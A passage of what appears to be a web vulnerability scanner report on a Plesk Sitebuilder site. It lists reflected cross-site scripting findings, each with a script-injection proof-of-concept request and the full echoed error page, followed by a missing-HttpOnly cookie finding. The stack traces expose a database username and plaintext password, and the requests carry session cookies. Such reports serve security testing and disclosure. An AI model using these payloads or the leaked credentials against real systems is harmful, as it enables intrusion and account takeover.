)

[_caseFolding:protected] => 0
[_autoQuoteIdentifiers:protected] => 1
)

[_schema:protected] =>
[_name:protected] => site_familia
[_cols:protected] => Array
(
[0] => id
[1] => pageset_id
[2] => template_category_id
[3] => code
[4] => uuid
[5] => is_built_in
[6] => user_id
)

[_primary:protected] => Array
(
[1] => id
)

[_identity:protected] => 1
[_sequence:protected] => 1
[_metadata:protected] => Array
(
[id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => id
[COLUMN_POSITION] => 1
[DATA_TYPE] => int
[DEFAULT] =>
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] => 1
[PRIMARY_POSITION] => 1
[IDENTITY] => 1
)

[pageset_id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => pageset_id
[COLUMN_POSITION] => 2
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[template_category_id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => template_category_id
[COLUMN_POSITION] => 3
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[code] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => code
[COLUMN_POSITION] => 4
[DATA_TYPE] => varchar
[DEFAULT] =>
[NULLABLE] =>
[LENGTH] => 255
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[uuid] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => uuid
[COLUMN_POSITION] => 5
[DATA_TYPE] => varchar
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] => 100
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[is_built_in] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => is_built_in
[COLUMN_POSITION] => 6
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[user_id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => user_id
[COLUMN_POSITION] => 7
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

)

[_metadataCache:protected] =>
[_rowClass:protected] => Base_DB_Table_Row
[_rowsetClass:protected] => Base_DB_Table_Rowset
[_referenceMap:protected] => Array
(
)

[_dependentTables:protected] => Array
(
)

)

[_objectClassName:protected] => SB_ORM_SiteFamilia
[_defaultOrder:private] =>
)

[family] =>
)

)

)

[2] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[line] => 221
[function] => _getSiteFamily
[class] => SB_Site_Processor
[type] => ::
)

[3] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Helpers\Wizard\Site.php
[line] => 123
[function] => makeNew
[class] => SB_Site_Processor
[type] => ::
)

[4] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Views\Wizard\Edit\Modules\Image.php
[line] => 17
[function] => getSite
[class] => SB_Helpers_Wizard_Site
[type] => ->
)

[5] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\XMLView.php
[line] => 63
[function] => prepare
[class] => SB_Views_Wizard_Edit_Modules_Image
[type] => ->
)

[6] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\htdocs\index.php
[line] => 55
[function] => __toString
[class] => SB_XMLView
[type] => ->
)

)

)

)

)

)
           </pre>
       </div>
   </body>
</html>

2.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/Image [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Edit/Modules/Image

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd206"><script>alert(1)</script>9d144815d58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg&dd206"><script>alert(1)</script>9d144815d58=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Modules/ImageGallery
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 11 Oct 2010 22:18:09 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>Internal Sitebuilder error</title>
       <style type="text/css">
           td, .text { font-family: Verdana; font-size: 11px; }
           #stackTrace { background: #EEEEEE; width: 100%; position: absolute; left: 0px; top: 0px; filter: alpha(opacity=80); -moz-opacity: 0.8; opacity: 0.8; }
           #showStackTrace { position: absolute; left: 0px; top: 0px; }
       </style>
   </head>
   
   <body>
       <table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0">
           <tr>
               <td width="100%" height="100%" align="center" valign="middle">
                   <table border="0" cellpadding="0" cellspacing="0">
                       <tr>
                           <td width="60" rowspan="2" valign="top">
                               <img src="/images/unsupported_browser/warning_left.gif" alt=""/>
                           </td>
                           <td valign="middle" height="40" style="background: #EEEEEE; color: #606060;">
                               <center><b>Internal Sitebuilder error.</b></center>
                               File: C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php; Line: 276<br/>Message: <b>PHP Notice : Trying to get property of non-object</b>; Code: 8<br/>                            </td>
                           <td width="7"><img src="/images/unsupported_browser/warning_right.gif" alt=""/></td>
                       </tr>
                       <tr>
                           <td colspan="2" style="padding-top: 10px;">
                               <table border="0" cellpadding="0" cellspacing="0" width="100%">
                                   <tr>
                                       <td>
                                           <a href="#" onclick="javascript: history.back();"><b>Go back</b></a>
                                       </td>
                                       <td align="right">
                                           <a href="mailto:bugreport@parallels.com?subject=[Sitebuilder problem report] - PHP Notice : Trying to get property of n...&body=This is an automatically generated message about problem with Sitebuilder.%0A%0AFile: C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php%0ALine: 276%0AMessage: PHP Notice : Trying to get property of non-object%0ACode: 8%0A%0AHost: vulnerarable.plesk.smb.10.2.0.site:2006%0ARequest URI: /index.php/Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg&dd206"><script>alert(1)</script>9d144815d58=1%0ARequest method: GET%0A%0ASitebuilder version: 1.0.0%0ASitebuilder build: 2009110318%0A"><b>Send report to developers</b></a>
                                       </td>
                                   </tr>
                               </table>
                           </td>
                       </tr>
                   </table>
               </td>
           </tr>
       </table>
       <div id="showStackTrace"><a class="text" style="color: #F0F0F0; text-decoration: none;" href="#" onclick="document.getElementById('stackTrace').style.display = 'block';">+</a></div>
       <div id="stackTrace" class="text" style="display: none;" onclick="document.getElementById('stackTrace').style.display = 'none';">
           <pre><b>Stack trace:</b>
Array
(
[0] => Array
(
[function] => SB_ExceptionHandler_EndUser
[args] => Array
(
[0] => Base_SyntaxException Object
(
[message:protected] => PHP Notice : Trying to get property of non-object
[string:private] =>
[code:protected] => 8
[file:protected] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[line:protected] => 276
[trace:private] => Array
(
[0] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\Base\SyntaxException.php
[line] => 48
[function] => handleError
[class] => Base_SyntaxException
[type] => ::
)

[1] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[line] => 276
[function] => handleError
[class] => Base_SyntaxException
[type] => ::
[args] => Array
(
[0] => 8
[1] => Trying to get property of non-object
[2] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[3] => 276
[4] => Array
(
[user] => SB_ORM_User Object
(
[_isPasswordModified:private] =>
[validatorFailList:protected] =>
[_data:protected] => Array
(
[id] => 2
[parent_id] => 1
[plan_id] => 0
[role_id] => 4
[user_settings_id] => 2
[user_name] => admin_Guest
[user_password] =>
[email] =>
[first_name] =>
[last_name] =>
[creation_date] => 2010-09-30T21:32:42-05:00
[auth_cookie] =>
[must_migrate] => 0
[uuid] => f7eca701-2829-833f-7d5d-cba9ebfb3cf9
[password_algo] => 0
[password_salt] =>
)

[_rRepository:protected] => Base_ORM_RelationRepository Object
(
[_relations:private] => Array
(
[settings] => Base_ORM_Relation Object
(
[_name:private] => settings
[_type:private] => 1
[_className:private] => SB_ORM_UserSettings
[_parentField:private] => user_settings_id
[_childField:private] => id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[parentUser] => Base_ORM_Relation Object
(
[_name:private] => parentUser
[_type:private] => 1
[_className:private] => SB_ORM_User
[_parentField:private] => parent_id
[_childField:private] => id
[_cascade:private] =>
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[role] => Base_ORM_Relation Object
(
[_name:private] => role
[_type:private] => 3
[_className:private] => SB_ORM_Role
[_parentField:private] => role_id
[_childField:private] => id
[_cascade:private] =>
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] => SB_ORM_Role Object
(
[validatorFailList:protected] =>
[_data:protected] => Array
(
[id] => 4
[name] => Guest
)

[_rRepository:protected] => Base_ORM_RelationRepository Object
(
[_relations:private] => Array
(
)

)

[_isModified:protected] =>
[_isNew:protected] =>
)

[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[plan] => Base_ORM_Relation Object
(
[_name:private] => plan
[_type:private] => 3
[_className:private] => SB_ORM_Plan
[_parentField:private] => plan_id
[_childField:private] => id
[_cascade:private] =>
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[childReferences] => Base_ORM_Relation Object
(
[_name:private] => childReferences
[_type:private] => 2
[_className:private] => SB_ORM_UserReference
[_parentField:private] => id
[_childField:private] => parent_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[parentReferences] => Base_ORM_Relation Object
(
[_name:private] => parentReferences
[_type:private] => 1
[_className:private] => SB_ORM_UserReference
[_parentField:private] => id
[_childField:private] => child_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[children] => Base_ORM_Relation Object
(
[_name:private] => children
[_type:private] => 2
[_className:private] => SB_ORM_User
[_parentField:private] => id
[_childField:private] => parent_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownSites] => Base_ORM_Relation Object
(
[_name:private] => ownSites
[_type:private] => 2
[_className:private] => SB_Site
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownHosts] => Base_ORM_Relation Object
(
[_name:private] => ownHosts
[_type:private] => 2
[_className:private] => SB_ORM_Host
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownPlans] => Base_ORM_Relation Object
(
[_name:private] => ownPlans
[_type:private] => 2
[_className:private] => SB_ORM_Plan
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownPagesets] => Base_ORM_Relation Object
(
[_name:private] => ownPagesets
[_type:private] => 2
[_className:private] => SB_ORM_Pageset
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[ownSiteFamilies] => Base_ORM_Relation Object
(
[_name:private] => ownSiteFamilies
[_type:private] => 2
[_className:private] => SB_ORM_SiteFamilia
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[customSettings] => Base_ORM_Relation Object
(
[_name:private] => customSettings
[_type:private] => 2
[_className:private] => SB_ORM_CustomSetting
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

[moduleSettings] => Base_ORM_Relation Object
(
[_name:private] => moduleSettings
[_type:private] => 2
[_className:private] => SB_ORM_ModuleSettings
[_parentField:private] => id
[_childField:private] => user_id
[_cascade:private] => 1
[_setNull:private] =>
[_arrayClassName:private] =>
[_value:private] =>
[_orderFieldName:private] =>
[_default:private] => Array
(
[field] =>
[value] =>
)

)

)

)

[_isModified:protected] =>
[_isNew:protected] =>
)

[siteFamilyBroker] => SB_ORM_SiteFamiliaBroker Object
(
[_table:private] => Base_DB_Table Object
(
[_db:protected] => Zend_Db_Adapter_Pdo_Mysql Object
(
[_pdoType:protected] => mysql
[_numericDataTypes:protected] => Array
(
[0] => 0
[1] => 1
[2] => 2
[INT] => 0
[INTEGER] => 0
[MEDIUMINT] => 0
[SMALLINT] => 0
[TINYINT] => 0
[BIGINT] => 1
[SERIAL] => 1
[DEC] => 2
[DECIMAL] => 2
[DOUBLE] => 2
[DOUBLE PRECISION] => 2
[FIXED] => 2
[FLOAT] => 2
)

[_config:protected] => Array
(
[adapter] => PDO_MYSQL
[host] => localhost
[username] => seuser
[password] => ppXiycZdP7
[dbname] => siteeditor
[port] => 3306
[options] => Array
(
[caseFolding] => 0
[autoQuoteIdentifiers] => 1
)

[driver_options] => Array
(
)

)

[_fetchMode:protected] => 2
[_profiler:protected] => Zend_Db_Profiler Object
(
[_queryProfiles:protected] => Array
(
)

[_enabled:protected] =>
[_filterElapsedSecs:protected] =>
[_filterTypes:protected] =>
)

[_defaultProfilerClass:protected] => Zend_Db_Profiler
[_connection:protected] => PDO Object
(
)

[_caseFolding:protected] => 0
[_autoQuoteIdentifiers:protected] => 1
)

[_schema:protected] =>
[_name:protected] => site_familia
[_cols:protected] => Array
(
[0] => id
[1] => pageset_id
[2] => template_category_id
[3] => code
[4] => uuid
[5] => is_built_in
[6] => user_id
)

[_primary:protected] => Array
(
[1] => id
)

[_identity:protected] => 1
[_sequence:protected] => 1
[_metadata:protected] => Array
(
[id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => id
[COLUMN_POSITION] => 1
[DATA_TYPE] => int
[DEFAULT] =>
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] => 1
[PRIMARY_POSITION] => 1
[IDENTITY] => 1
)

[pageset_id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => pageset_id
[COLUMN_POSITION] => 2
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[template_category_id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => template_category_id
[COLUMN_POSITION] => 3
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[code] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => code
[COLUMN_POSITION] => 4
[DATA_TYPE] => varchar
[DEFAULT] =>
[NULLABLE] =>
[LENGTH] => 255
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[uuid] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => uuid
[COLUMN_POSITION] => 5
[DATA_TYPE] => varchar
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] => 100
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[is_built_in] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => is_built_in
[COLUMN_POSITION] => 6
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

[user_id] => Array
(
[SCHEMA_NAME] =>
[TABLE_NAME] => site_familia
[COLUMN_NAME] => user_id
[COLUMN_POSITION] => 7
[DATA_TYPE] => int
[DEFAULT] => 0
[NULLABLE] =>
[LENGTH] =>
[SCALE] =>
[PRECISION] =>
[UNSIGNED] =>
[PRIMARY] =>
[PRIMARY_POSITION] =>
[IDENTITY] =>
)

)

[_metadataCache:protected] =>
[_rowClass:protected] => Base_DB_Table_Row
[_rowsetClass:protected] => Base_DB_Table_Rowset
[_referenceMap:protected] => Array
(
)

[_dependentTables:protected] => Array
(
)

)

[_objectClassName:protected] => SB_ORM_SiteFamilia
[_defaultOrder:private] =>
)

[family] =>
)

)

)

[2] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Site\Processor.php
[line] => 221
[function] => _getSiteFamily
[class] => SB_Site_Processor
[type] => ::
)

[3] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Helpers\Wizard\Site.php
[line] => 123
[function] => makeNew
[class] => SB_Site_Processor
[type] => ::
)

[4] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Views\Wizard\Edit\Modules\Image.php
[line] => 17
[function] => getSite
[class] => SB_Helpers_Wizard_Site
[type] => ->
)

[5] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\XMLView.php
[line] => 63
[function] => prepare
[class] => SB_Views_Wizard_Edit_Modules_Image
[type] => ->
)

[6] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\htdocs\index.php
[line] => 55
[function] => __toString
[class] => SB_XMLView
[type] => ->
)

)

)

)

)

)
           </pre>
       </div>
   </body>
</html>

2.3. http://vulnerarable.plesk.smb.10.2.0.site:2006/localizedimage.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /localizedimage.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7b4"><script>alert(1)</script>eb263b2f76a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /localizedimage.php?3b7b4"><script>alert(1)</script>eb263b2f76a=1 HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:44:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>Internal Sitebuilder error</title>
       <style type="text/css">
           td, .text { font-family: Verdana; font-size: 11px; }
           #stackTrace { background: #EEEEEE; width: 100%; position: absolute; left: 0px; top: 0px; filter: alpha(opacity=80); -moz-opacity: 0.8; opacity: 0.8; }
           #showStackTrace { position: absolute; left: 0px; top: 0px; }
       </style>
   </head>
   
   <body>
       <table width="100%" style="height: 100%" cellspacing="0" cellpadding="0" border="0">
           <tr>
               <td width="100%" height="100%" align="center" valign="middle">
                   <table border="0" cellpadding="0" cellspacing="0">
                       <tr>
                           <td width="60" rowspan="2" valign="top">
                               <img src="/images/unsupported_browser/warning_left.gif" alt=""/>
                           </td>
                           <td valign="middle" height="40" style="background: #EEEEEE; color: #606060;">
                               <center><b>Internal Sitebuilder error.</b></center>
                               File: C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\Zend\Registry.php; Line: 145<br/>Message: <b>No entry is registered for key 'user'</b>; Code: 0<br/>                            </td>
                           <td width="7"><img src="/images/unsupported_browser/warning_right.gif" alt=""/></td>
                       </tr>
                       <tr>
                           <td colspan="2" style="padding-top: 10px;">
                               <table border="0" cellpadding="0" cellspacing="0" width="100%">
                                   <tr>
                                       <td>
                                           <a href="#" onclick="javascript: history.back();"><b>Go back</b></a>
                                       </td>
                                       <td align="right">
                                           <a href="mailto:bugreport@parallels.com?subject=[Sitebuilder problem report] - No entry is registered for key 'user'...&body=This is an automatically generated message about problem with Sitebuilder.%0A%0AFile: C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\Zend\Registry.php%0ALine: 145%0AMessage: No entry is registered for key 'user'%0ACode: 0%0A%0AHost: vulnerarable.plesk.smb.10.2.0.site:2006%0ARequest URI: /localizedimage.php?3b7b4"><script>alert(1)</script>eb263b2f76a=1%0ARequest method: GET%0A%0ASitebuilder version: 1.0.0%0ASitebuilder build: 2009110318%0A"><b>Send report to developers</b></a>
                                       </td>
                                   </tr>
                               </table>
                           </td>
                       </tr>
                   </table>
               </td>
           </tr>
       </table>
       <div id="showStackTrace"><a class="text" style="color: #F0F0F0; text-decoration: none;" href="#" onclick="document.getElementById('stackTrace').style.display = 'block';">+</a></div>
       <div id="stackTrace" class="text" style="display: none;" onclick="document.getElementById('stackTrace').style.display = 'none';">
           <pre><b>Stack trace:</b>
Array
(
[0] => Array
(
[function] => SB_ExceptionHandler_EndUser
[args] => Array
(
[0] => Zend_Exception Object
(
[message:protected] => No entry is registered for key 'user'
[string:private] =>
[code:protected] => 0
[file:protected] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\Zend\Registry.php
[line:protected] => 145
[trace:private] => Array
(
[0] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\Base\Registry.php
[line] => 42
[function] => get
[class] => Zend_Registry
[type] => ::
)

[1] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\UISettings.php
[line] => 29
[function] => get
[class] => Base_Registry
[type] => ::
)

[2] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\UISettings.php
[line] => 36
[function] => __construct
[class] => SB_UISettings
[type] => ->
)

[3] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Locale.php
[line] => 40
[function] => getInstance
[class] => SB_UISettings
[type] => ::
)

[4] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\include\SB\Locale.php
[line] => 22
[function] => getLocaleName
[class] => SB_Locale
[type] => ::
)

[5] => Array
(
[file] => C:\Program Files (x86)\Parallels\Plesk\Siteeditor\htdocs\localizedimage.php
[line] => 9
[function] => getSection
[class] => SB_Locale
[type] => ::
)

)

)

)

)

)
           </pre>
       </div>
   </body>
</html>

3. Cookie without HttpOnly flag set  previous  next
There are 37 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://vulnerarable.plesk.smb.10.2.0.site:2006/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 06:07:17 GMT
Connection: close


3.2. http://vulnerarable.plesk.smb.10.2.0.site:2006/Login  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Login

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login?returnUrl=%2Fwysiwyg%2Fcustom%2Fskins%2Fdefault%2Fimages%2Ftoolbar.buttonarrow.gif HTTP/1.1
Accept: */*
